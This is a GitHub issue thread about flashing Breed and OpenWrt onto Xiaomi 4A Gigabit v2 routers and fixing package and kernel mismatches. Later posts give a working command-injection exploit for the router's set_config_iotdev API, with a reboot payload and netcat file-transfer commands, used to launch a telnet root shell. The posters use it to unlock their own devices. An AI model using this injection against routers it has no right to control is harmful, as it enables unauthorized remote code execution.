@MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's breed-mt7621-pbr-m1.bin

Answer 64 · 2022-11-06T17:12:05.000Z

@MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's breed-mt7621-pbr-m1.bin

@wbs306 Thank you very much !!! and Please see #155 (comment),

@mark4z Check it out! Let me know! Thx!

Answer 65 · 2022-11-07T11:19:35.000Z

@MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's breed-mt7621-pbr-m1.bin

@wbs306 Thank you very much !!! and Please see #155 (comment),

@mark4z Check it out! Let me know! Thx!

可以教教我怎么刷吗

Answer 66 · 2022-11-07T16:07:05.000Z

可以教教我怎么刷吗
@mark4z 請看看我那個連結裡面內容, 有教 #155 (comment),

Answer 67 · 2022-11-09T07:33:15.000Z

@MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's breed-mt7621-pbr-m1.bin

thanks for your suggestion. My device is Xiaomi 4A Gigabit (2.30.20).
first, I have downloaded the code with the link here
and successfully got the console via WSL in windows.
Then I used mobaxterm to upload breed-mt7621-pbr-m1.bin to path /tmp
finally, I use command mtd -r write /tmp/breed.bin Bootloader
after a while， my device turns to a faint blue light and the ports are unresponsive ， it must be broken. (sad)
I have refered to the tutorials Links

Do you know the reason for the failure to flash the breed? I have backed up the original system of the router and plan to use the hardware programmer when I have time.

Answer 68 · 2022-11-09T08:42:24.000Z

@MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's breed-mt7621-pbr-m1.bin

thanks for your suggestion. My device is Xiaomi 4A Gigabit (2.30.20). first, I have downloaded the code with the link here and successfully got the console via WSL in windows. Then I used mobaxterm to upload breed-mt7621-pbr-m1.bin to path /tmp finally, I use command mtd -r write /tmp/breed.bin Bootloader after a while， my device turns to a faint blue light and the ports are unresponsive ， it must be broken. (sad) I have refered to the tutorials Links

Do you know the reason for the failure to flash the breed? I have backed up the original system of the router and plan to use the hardware programmer when I have time.

This breed broken ur leds, so that it's always faint blue light, but do not worry, just try 192.168.1.1 to enter breed gui.

Answer 69 · 2022-11-09T08:58:01.000Z

@mark4z @fengjiaqi927
I rewrote my readme.md, probably a better instruction to follow.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2

R4AGv2 working openwrt bin file (except LED lights)
Download build: wetransfer.com#L1 Download Link: https://we.tl/t-wUdXMxjDBz
or
Release Bin file

@fengjiaqi927, mark4z is right, BREED gui is at 192.168.1.1, Openwrt gui is at 192.168.31.1, You are confused with addresses. .

Answer 70 · 2022-11-09T09:53:34.000Z

Xiaomi R4AGv2 router seems working with Openwrt bin, but LED lights are not working properly. Always blue faint lights turned on.....

Anyone know how to fix this issue?

Answer 71 · 2022-11-09T14:42:00.000Z

@MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's breed-mt7621-pbr-m1.bin

thanks for your suggestion. My device is Xiaomi 4A Gigabit (2.30.20). first, I have downloaded the code with the link here and successfully got the console via WSL in windows. Then I used mobaxterm to upload breed-mt7621-pbr-m1.bin to path /tmp finally, I use command mtd -r write /tmp/breed.bin Bootloader after a while， my device turns to a faint blue light and the ports are unresponsive ， it must be broken. (sad) I have refered to the tutorials Links
Do you know the reason for the failure to flash the breed? I have backed up the original system of the router and plan to use the hardware programmer when I have time.

This breed broken ur leds, so that it's always faint blue light, but do not worry, just try 192.168.1.1 to enter breed gui.

Thanks! @MrTaiKe and @mark4z. You saved my life ！！！！ The gateway changed from 192.168.31.1 to 192.168.1.1 !
Although after input the command ipconfig in windows cmd, there is no gateway in the eth.

By the way, the password of the new image openwrt-ramips-mt7621-xiaomi_mi-router-4a-gigabit-v2-squashfs-sysupgrade.bin is password

I want to download uci-app-bypass for the .bin you provided, but the kernel version is mismatched, can you build one for me if this problem is eassy to you? I did not know how to build ...... @MrTaiKe
I have taken this job to the TODO list, once i successed, i will upload the new firmware image for the community~~~

Installing luci-app-bypass (git-23.303.44828-ba42a9a) to root...
Downloading https://op.supes.top/packages/mipsel_24kc/kiddin9/luci-app-bypass_git-23.303.44828-ba42a9a_all.ipk
Collected errors:

pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-reject
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-ipt
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-log
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-core
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nfnetlink
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-ipset
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-conntrack
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-nat
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-nat
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-tproxy
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-tproxy
pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-conntrack-netlink
opkg_download: Failed to download https://op.supes.top/packages/mipsel_24kc/kiddin9/luci-app-bypass_git-23.303.44828-ba42a9a_all.ipk, wget returned 4.
opkg_download: Check your network settings and connectivity.
opkg_install_pkg: Failed to download luci-app-bypass. Perhaps you need to run 'opkg update'?
opkg_install_cmd: Cannot install package luci-app-bypass.

the kernel information of the firmware is shown as below:

root@R4AGv2:~# uname -a
Linux R4AGv2 5.4.216 #0 SMP Sun Oct 9 02:46:49 2022 mips GNU/Linux

Answer 72 · 2022-11-09T15:55:42.000Z

@fengjiaqi927, the world should be better when people can help each other! 👍 I am new to Openwrt and I spent a lot of time trying to figure things out. That is painful. 讓台客幫點忙小意思 😊 . Best Luck to you!
(Please star my repositories if it helps) lol

Answer 73 · 2022-11-10T14:02:54.000Z

@fengjiaqi927 I compiled a minimal version with luci-app-bypass. it took almost 3 hours. I am not sure why there is no sysupgrade bin, but there is also a ipk of luci-app-bypass. Perhaps, you still can find it useful for now. Give it a try and let me know. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3435975079 Hope it helps!

(NOTE: I guess that I loaded too many themes causing the image too big to produce sysupgrade.bin)

Answer 74 · 2022-11-11T07:34:05.000Z

@fengjiaqi927 I compiled a minimal version with luci-app-bypass. it took almost 3 hours. I am not sure why there is no sysupgrade bin, but there is also a ipk of luci-app-bypass. Perhaps, you still can find it useful for now. Give it a try and let me know. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3435975079 Hope it helps!

(NOTE: I guess that I loaded too many themes causing the image too big to produce sysupgrade.bin)
@MrTaiKe Thanks for your luci-app-bypass.ipk

I open the Internet Information Services in my windows10. And put the packages you provided in the wwwroot dir.
Then I add the local packages to the opkg configs like this :
(192.168.31.227 is my windows10's IP)

src/gz local_base http://192.168.31.227/base
src/gz local_luci http://192.168.31.227/luci
src/gz local_packages http://192.168.31.227/packages
src/gz local_routing http://192.168.31.227/routing
src/gz local_small8 http://192.168.31.227/small8
src/gz local_telephony http://192.168.31.227/telephony

Then I use opkg update

root@R4AGv2:~# opkg update
Downloading http://192.168.31.227/base/Packages.gz
Updated list of available packages in /var/opkg-lists/local_base
Downloading http://192.168.31.227/luci/Packages.gz
Updated list of available packages in /var/opkg-lists/local_luci
Downloading http://192.168.31.227/packages/Packages.gz
Updated list of available packages in /var/opkg-lists/local_packages
Downloading http://192.168.31.227/routing/Packages.gz
Updated list of available packages in /var/opkg-lists/local_routing
Downloading http://192.168.31.227/small8/Packages.gz
Updated list of available packages in /var/opkg-lists/local_small8
Downloading http://192.168.31.227/telephony/Packages.gz
Updated list of available packages in /var/opkg-lists/local_telephony
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/targets/ramips/mt7621/packages/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_core
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/base/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_base
Downloading https://mirrors.cloud.tencent.com/lede/releases/18.06.9/packages/mipsel_24kc/luci/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_luci
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/packages/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_packages
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/routing/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_routing
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/small8/Packages.gz
*** Failed to download the package list from https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/small8/Packages.gz

Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/telephony/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_telephony
Collected errors:
 * opkg_download: Failed to download https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/small8/Packages.gz, wget returned 8.

（The mirror source does not have this file, but it seems to have no effect, ignore the error）

Then I use opkg install luci-app-bypass

opkg install luci-app-bypass
Multiple packages (libgcc1 and libgcc1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libgcc1 and libgcc1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libgcc1 and libgcc1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libatomic1 and libatomic1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libatomic1 and libatomic1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Unknown package 'luci-app-bypass'.
Collected errors:
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-reject
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-ipt
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-log
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-core
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nfnetlink
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-ipt-ipset
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-conntrack
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-nat
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-nat
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-tproxy
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-tproxy
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nf-conntrack-netlink
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-reject6
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-nf-reject6 found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nf-conntrack6
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-log6
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-nf-log6 found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-crypto-hash
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-crypto-crc32c
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-crypto-crc32c found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-lib-crc32c
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-lib-crc32c found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nft-core
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-nft-core found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency redsocks2 for luci-app-bypass
 * pkg_hash_fetch_best_installation_candidate: Packages for luci-app-bypass found, but incompatible with the architectures configured
 * opkg_install_cmd: Cannot install package luci-app-bypass.

I search the dependency packages in the local source you provided, the kernel version is 5.4.223, which is mismatch with the needed kernel version 5.10.153.

I have no idea how to solve this error. I will try to build a firmware myself. could you teach me how to build a R4AGv2 with passwall.ipk ？
I plan to refer to the link below to learn the operation process, but I don't know how to combine with the existing 4A configuration file.
xiaorouji/openwrt-passwall#1603

Answer 75 · 2022-11-11T08:02:33.000Z

I have no idea how to solve this error. I will try to build a firmware myself. could you teach me how to build a R4AGv2 with passwall.ipk ？ I plan to refer to the link below to learn the operation process, but I don't know how to combine with the existing 4A configuration file. xiaorouji/openwrt-passwall#1603

@fengjiaqi927
I am not using Windows OS, and I am not sure all your setups. I recommend you to watch this video first before you spend more time on this. https://www.youtube.com/watch?v=WJ3VollEYy4 , especially the fifth minutes 第5分鍾請注意。 Pay attention that he provided a few ways to install new package.
Maybe it will help to save you a lot of time. let me know if it helps!

Answer 76 · 2022-11-11T09:58:30.000Z

I have no idea how to solve this error. I will try to build a firmware myself. could you teach me how to build a R4AGv2 with passwall.ipk ？ I plan to refer to the link below to learn the operation process, but I don't know how to combine with the existing 4A configuration file. xiaorouji/openwrt-passwall#1603

@fengjiaqi927 I am not using Windows OS, and I am not sure all your setups. I recommend you to watch this video first before you spend more time on this. https://www.youtube.com/watch?v=WJ3VollEYy4 , especially the fifth minutes 第5分鍾請注意。 Pay attention that he provided a few ways to install new package. Maybe it will help to save you a lot of time. let me know if it helps!

It seems that I still have a long way to go. And the video is tend to teach how to install software on openwrt. But I want to learn how to build the ipk for the specified kernel and platform with the source code. or learn how to build a new sysupgrade.bin on xiaomi 4AGv2 with the specified kernel(then I can use the bypass with kernel 5.10.146-1-1 https://op.supes.top/packages/mipsel_24kc/kiddin9/luci-app-bypass_git-23.303.44828-ba42a9a_all.ipk)
Thanks again for your help!!!! @MrTaiKe 路漫漫其修远兮，吾将上下而求索

Answer 77 · 2022-11-12T04:26:24.000Z

@fengjiaqi927
Learning how to compile Openwrt sysupgrade.bin? it's a long way to learn, For a quick starter, I picked some up by reading the README.md of https://github.com/wbs306/Action_OpenWrt_Xiaomi_R4AG. ( I started learning from 6 days ago.)

Meanwhile, Check this out, there are ipk files for passwall1, passwall2, bypass, built with Kernel Version 5.4.216.
However, when I try to compile them for you, I guess that the image exceeded 16MB, so it did not output a syssugrade.bin, because there are many dependencies..... this device only has ROM 16MB.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3449151089#artifacts

I also built a minimal version of Kernel 5.4.216, which contains a syssugrade.bin that you can flash onto your router.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3447034491#artifacts

You probably could try something out from these two built(s). Perhaps, first flash syssugrade.bin from 3447034491, and manually add ipks from 3449151089. Probably have to watch out the ROM space limitation.... You probably can not have all ipks install, or you will have to buy a device with larger ROM. BEST LUCK to you

Answer 78 · 2022-11-12T11:48:20.000Z

@fengjiaqi927 Learning how to compile Openwrt sysupgrade.bin? it's a long way to learn, For a quick starter, I picked some up by reading the README.md of https://github.com/wbs306/Action_OpenWrt_Xiaomi_R4AG. ( I started learning from 6 days ago.)

Meanwhile, Check this out, there are ipk files for passwall1, passwall2, bypass, built with Kernel Version 5.4.216. However, when I try to compile them for you, I guess that the image exceeded 16MB, so it did not output a syssugrade.bin, because there are many dependencies..... this device only has ROM 16MB. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3449151089#artifacts

I also built a minimal version of Kernel 5.4.216, which contains a syssugrade.bin that you can flash onto your router. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3447034491#artifacts

You probably could try something out from these two built(s). Perhaps, first flash syssugrade.bin from 3447034491, and manually add ipks from 3449151089. Probably have to watch out the ROM space limitation.... You probably can not have all ipks install, or you will have to buy a device with larger ROM. BEST LUCK to you

@MrTaiKe
I have tried the guide and successfully installed the passwall ~

Thank U !!!

It seems that the supported protocols are limited due to space constraints , eg : v2ray

Anyway, Let's put an end to this for now ~ ， I can use SSR node alternatively

Answer 79 · 2022-11-12T12:38:44.000Z

@fengjiaqi927
I am very glad you made it!!! very good!! Yes, you will have to unload unwanted app to accompany the ROM space constrain. So you somehow managed to combined both 3447034491 and 3449151089 to make it happen? Was dealing with dependencies a big hurdle this time? I am curious if you did all this with command lines? Thx

Answer 80 · 2022-11-14T02:45:40.000Z

@fengjiaqi927 I am very glad you made it!!! very good!! Yes, you will have to unload unwanted app to accompany the ROM space constrain. So you somehow managed to combined both 3447034491 and 3449151089 to make it happen? Was dealing with dependencies a big hurdle this time? I am curious if you did all this with command lines? Thx

I reboot my 4AGv2 and flash the 3447034491.bin at first. Then I download the packages in 3449151089 and try to install by follow step :

A simple tutorial for installing packages locally：

open the internet information services (IIS) on windows to establish a local web server
download the packages to be installed, and copy them to the root directory of the web page
test the web server by enter the website http://192.168.31.227/base(the IP should be replaced accroding to yours), and try to download the .ikp file.
add the local packages to the opkg config list

src/gz local_base http://192.168.31.227/base
src/gz local_luci http://192.168.31.227/luci
src/gz local_packages http://192.168.31.227/packages
src/gz local_routing http://192.168.31.227/routing
src/gz local_small8 http://192.168.31.227/small8
src/gz local_telephony http://192.168.31.227/telephony

opkg update
opkg install luci-app-passwall

Answer 81 · 2022-11-14T03:34:54.000Z

hello! can you please also build ipk openvpn (openvpn-openssl and luci-app-openvpn) for kernel version 5.4.216?

Answer 82 · 2022-11-15T11:11:48.000Z

hello! can you please also build ipk openvpn (openvpn-openssl and luci-app-openvpn) for kernel version 5.4.216?

@ivan-semkin-gismart , I tried to build one for you for kernel 5.4.216, but failed a few times. was able to built one with 5.4.224, you can browse the folder "Luci" to find ipks etc... Hope that this could help you anyway.
openvpn-openssl and luci-app-openvpn + sysupgrade.bin

Answer 83 · 2022-11-15T12:06:17.000Z

I reboot my 4AGv2 and flash the 3447034491.bin at first. Then I download the packages in 3449151089 and try to install by follow step

@fengjiaqi927 , 👍 Great!! Glad it all worked out smoothly!

Answer 84 · 2022-11-15T14:34:40.000Z

@MrTaiKe I don't think that it will work due to kernel version mismatch. Can you maybe try to build wireguard-tools then? And luci-app-wireguard

Answer 85 · 2022-11-15T15:24:40.000Z

@MrTaiKe I don't think that it will work due to kernel version mismatch. Can you maybe try to build wireguard-tools then? And luci-app-wireguard

@ivan-semkin-gismart , did you look into the zip file? It also has the sysupgrade.bin. It was a base system built ONLY with openvpn-openssl and luci-app-openvpn, a very slim bin (image). Perhaps, you could use this bin to start with other ipk(s). Btw, I also wonder if you still could install them onto any kernel version with 5.4.xx ? what do you think?

If none of them works, let me know. I will try

Answer 86 · 2022-11-15T17:05:15.000Z

@MrTaiKe thank you for the help, I was able to get openvpn working

Answer 87 · 2022-11-16T02:16:24.000Z

@MrTaiKe thank you for the help, I was able to get openvpn working

@ivan-semkin-gismart, I am glad to hear it works. Here is a also link for wireguard ipk(s) with Kernel 5.4.224
I guess you probably find these ipk somehow useful. Perhaps, maybe it could work with any kernel version starting with 5.4.xx, ( I am not sure. Plz let me know if it works. Thx!)
wireguard-tools and luci-app-wireguard + sysupgrade.bin

Answer 88 · 2022-11-16T14:48:55.000Z

@MrTaiKe I was able to install it on 5.4.xx, I guess only kernel modules are completely incompatible (kmod-*)

Answer 89 · 2023-01-01T15:13:47.000Z

I managed to get shell access on this device without a chip programmer

The instructions are valid for macOS and GNU/Linux. I don't know how to pipe stuff from or to netcat on Windows.

Introduction

I am on R4AV2 firmware MiWiFi 稳定版 2.30.20
This firmware has the speedtest exploit patched, but it still has the set_config_iotdev remote exec exploit:
In short, if you make a get request (open the link in the browser) to http://{{{ROUTER_IP}}}/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0A{{{URL_ENCODED_COMMAND}}}%0A , the command in {{{URL_ENCODED_COMMAND}}} gets executed.
By default, {{{ROUTER_IP}}} is 192.168.31.1 (default gateway in network settings of your PC connected to the router). {{{STOK}}} can be found in the URL by logging into the admin console of the router (http://192.168.31.1/cgi-bin/luci/;stok=STOK_WILL_BE_HERE/web/home#router). And, well, {{{URL_ENCODED_COMMAND}}} is the shell command that you want to execute in urlencoded format (https://www.urlencoder.io/)
You can verify the exploit by executing the reboot command: http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A - the router will reboot.
Unfortunately for us, Xiaomi removed dropbear (ssh) binaries in this firmware. And I couldn't make built-in telnet work.

NetCat saves the day

But! nc (netcat/ncat) works like a charm! Abusing that, we can transfer any files to or from the router (and thus we can upload working telnet/ssh/ftp/whatever binaries). ncat can be downloaded here https://nmap.org/download
To download a file from the router:
On your computer: run ncat -l 1234 > downloaded_file_name.txt
On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 < /path/to/file_on_router' (via the exploit mentioned above)
You can test that by downloading /etc/hosts from the router.
You should replace {{{YOUR_PC_IP_ADDR}}} with a local IP of your computer (192.168.31.X)
To upload a file to the router:
On your computer: run ncat -l 1234 < file_to_upload_from_your_pc.txt
On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 > /path/to/saved_file' (via the exploit mentioned above)
You can test it by uploading a small file from your PC to /tmp/file.txt, and then download it back via the method described above.
But! Here's a catch. From my testing, the router can only receive files up to 8Kb via nc. Our telnet/ssh binaries will surely be bigger than that. So, we need to split our binaries.

Splitting files

As I don't like splitting raw binaries, I decided to convert my binary to base64 first. You can do it here, by example: https://base64.guru/converter/encode/file
To split the resulting base64 file into pieces, run split -b 6K base64.txt on your computer (I decided to split into 6Kb pieces to be extra safe, more testing required)
The result of this command will be a folder full of files named xaa, xab, xac... I uploaded all of them to a separate folder on the router (/tmp/split), using the ncat method described above.
Then, I had to combine them back into a single file. To do that, run cat /tmp/split/x* > /tmp/split/final.txt on your router.
To decode a base64 encoded file into a binary, run base64 -d /tmp/split/final.txt > /tmp/split/final on your router.
To be extra sure that the file was not damaged, I decided to validate the md5 sum of the file by running md5sum /tmp/split/final on the router.
Then, make the file executable by running chmod +x /tmp/split/final on your router.
And finally, the file is ready to be executed.

Shell access

In my case, I uploaded a precompiled busybox binary with telnet supported.
I ran it /tmp/split/final telnetd on my router, and the telnet server was successfully launched.
Then, I connected to it by running telnet 192.168.31.1 on my PC.

Afterthoughts

To simplify the process of uploading multiple files to the router, I made a small Python script for batch uploads:
upl_file.py.zip
To use it, first, edit the script to configure your PC's IP addr and router's STOK. Then, make a /tmp/split folder by executing mkdir /tmp/split/ on the router. Create a new folder on your PC called split in the same folder where your script is, and put all xaa, xab, xac... files there. Install requests module for python3 if not already installed by running pip3 install requests --user on your PC. And finally, run the script by executing python3 upl_file.py on your PC
I also realized that I can explore the file system of the router by piping stdout/stderr of commands on the router to a file in /tmp, and then downloading the file to my PC via ncat. I also made a script for that, but as I figured out how to get telnet access, this doesn't seem relevant, so I will not be posting that.
Known working busybox binary: busybox.zip
For the lazy ones, here's an already split busybox binary: split_busybox.zip

Good job! I almost give up for this router. Nice Russia guy!

i launch telnet up, use your way。。 Nice Russia guy!👍👍👍

but telnet login fail..
root use password
, root, password all of this
fail fail....

this is the telnet output copy
XiaoQiang login: root
Password:
Login incorrect
XiaoQiang login:
Login timed out after 60 seconds

so what is your telnet root password , the words i wana

Answer 90 · 2023-01-11T12:21:07.000Z

@chekn there is an updated version of the script at #155

If telnet is launched successfully then there should be no telnet password with the login root. Check out the pull request above

Answer 91 · 2023-01-11T12:52:04.000Z

I've broke 3 Routers with the script without problem, so please try it and give me a feedback. Maybe I have the time to reimplement the script a bit better, include the old attack, make it a bit more modular if they patch the backdoor one day and we have to use another approach.

Answer 92 · 2023-01-13T02:13:08.000Z

@chekn there is an updated version of the script at #155

If telnet is launched successfully then there should be no telnet password with the login root. Check out the pull request above

tks, i have pass. now i can "drive car" every where
1、in the operate process, i direct python flask a httpserver, wget a new telnet
2、when i write openwrt success, i logined it, it is poor;
the wan is never through util i swith write this [PandoraBox_2990] and confiure the vlan
finally the wan is open， flow traffic normal, i relax。。

the route web:

Answer 93 · 2023-01-13T02:13:50.000Z

I've broke 3 Routers with the script without problem, so please try it and give me a feedback. Maybe I have the time to reimplement the script a bit better, include the old attack, make it a bit more modular if they patch the backdoor one day and we have to use another approach.

tks

Answer 94 · 2023-03-13T06:02:07.000Z

I managed to get shell access on this device without a chip programmer

The instructions are valid for macOS and GNU/Linux. I don't know how to pipe stuff from or to netcat on Windows.

Introduction

I am on R4AV2 firmware MiWiFi 稳定版 2.30.20

This firmware has the speedtest exploit patched, but it still has the set_config_iotdev remote exec exploit:

In short, if you make a get request (open the link in the browser) to http://{{{ROUTER_IP}}}/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0A{{{URL_ENCODED_COMMAND}}}%0A , the command in {{{URL_ENCODED_COMMAND}}} gets executed.

By default, {{{ROUTER_IP}}} is 192.168.31.1 (default gateway in network settings of your PC connected to the router). {{{STOK}}} can be found in the URL by logging into the admin console of the router (http://192.168.31.1/cgi-bin/luci/;stok=STOK_WILL_BE_HERE/web/home#router). And, well, {{{URL_ENCODED_COMMAND}}} is the shell command that you want to execute in urlencoded format (https://www.urlencoder.io/)

You can verify the exploit by executing the reboot command: http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A - the router will reboot.

Unfortunately for us, Xiaomi removed dropbear (ssh) binaries in this firmware. And I couldn't make built-in telnet work.

NetCat saves the day

But! nc (netcat/ncat) works like a charm! Abusing that, we can transfer any files to or from the router (and thus we can upload working telnet/ssh/ftp/whatever binaries). ncat can be downloaded here https://nmap.org/download

To download a file from the router: On your computer: run ncat -l 1234 > downloaded_file_name.txt On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 < /path/to/file_on_router' (via the exploit mentioned above) You can test that by downloading /etc/hosts from the router.

You should replace {{{YOUR_PC_IP_ADDR}}} with a local IP of your computer (192.168.31.X)

To upload a file to the router: On your computer: run ncat -l 1234 < file_to_upload_from_your_pc.txt On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 > /path/to/saved_file' (via the exploit mentioned above) You can test it by uploading a small file from your PC to /tmp/file.txt, and then download it back via the method described above.

But! Here's a catch. From my testing, the router can only receive files up to 8Kb via nc. Our telnet/ssh binaries will surely be bigger than that. So, we need to split our binaries.

Splitting files

